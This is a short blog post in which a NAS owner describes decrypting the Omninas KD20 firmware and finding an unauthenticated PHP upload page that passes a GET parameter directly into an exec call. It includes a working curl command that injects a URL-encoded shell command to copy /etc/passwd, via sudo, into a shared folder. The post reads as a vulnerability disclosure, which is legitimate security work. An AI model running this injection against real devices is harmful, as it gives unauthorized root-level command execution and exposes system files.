Because the firmware on the Omninas KD20 is somewhat broken (see Samba bug #10584) I was trying to get access in an attempt to fix it. Fortunately some people figured there was easy access with old firmware and documented at nas-central how to decrypt the firmware, which applies to current firmware as well. Once I had rootfs.ubi mounted using nandsim I went looking for possible remote exploits and I found one in an external accessible page without password protection.
To make a long story short, this page will pass a GET variable right into an exec call without any verification. As a result, all you need to do is call curl with an url-encoded command as in the following example:
curl -F 'userfile=@/dev/null;filename="test.txt"' 'http://192.168.x.x/filesystem/api-1.0/dir_action.php?type=upload&p=%24(sudo%20cat%20%2Fetc%2Fpasswd%20%3E%20%2Fshare%2Fatonnas%2Fdisk%2Ftest.passwd)'
The above command will put the contents of /etc/passwd in test.passwd in the default 'disk' share. And yes, as a bonus you also get an empty file called test.txt in the same folder!
Happy hacking!
No comments:
Post a Comment